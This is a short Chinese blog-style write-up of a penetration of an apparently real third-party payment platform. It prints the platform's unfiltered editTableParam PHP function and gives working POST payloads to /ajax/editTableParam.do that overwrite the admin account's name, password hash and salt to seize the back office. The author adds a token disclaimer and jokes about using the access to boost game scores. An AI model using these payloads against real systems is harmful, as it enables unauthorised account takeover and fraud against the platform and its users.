记一次某三方支付平台渗透-任意文件读取后获得后台
如果有志同道合的技术朋友可以加我QQ:2849084774。
项目:
提示:这是一个某支付平台的源码
例如:项目场景:该平台用于对接一些特殊行业,你懂的,总他的源码可以看出下面的问题
问题描述:
提示:明显有一个修改库信息的的地方,并且没有过滤
下面是源码:
public function editTableParam()
{
$table = input('post.table');
$param = input('post.param');
$value = input('post.value');
$id = input('post.id', 'id');
$idValue = input('post.idValue');
return Db::name($table)->where([$id => $idValue])->update([$param => $value]);
}
于是写下payload:
根据自己搭建数据库的表明得知它的密码是通过盐值来加密,因此自己生成一个盐值、
/ajax/editTableParam.do
payload="table=admin¶m=name&value=ceshi001&idValue=1"
table=admin¶m=passwd&value=a91545d4ecf70aaa68acbe3e13792777&&idValue=1
table=admin¶m=passwd_salt&value=2xh2J3HYDITwZqv4AyGx&idValue=1
}
注入成功:然后直接在后台登陆你的账号密码即可
请勿用于非法用途
得到后台管理员权限,那就可以给心爱的游戏直接上分啦,效果你懂得!!!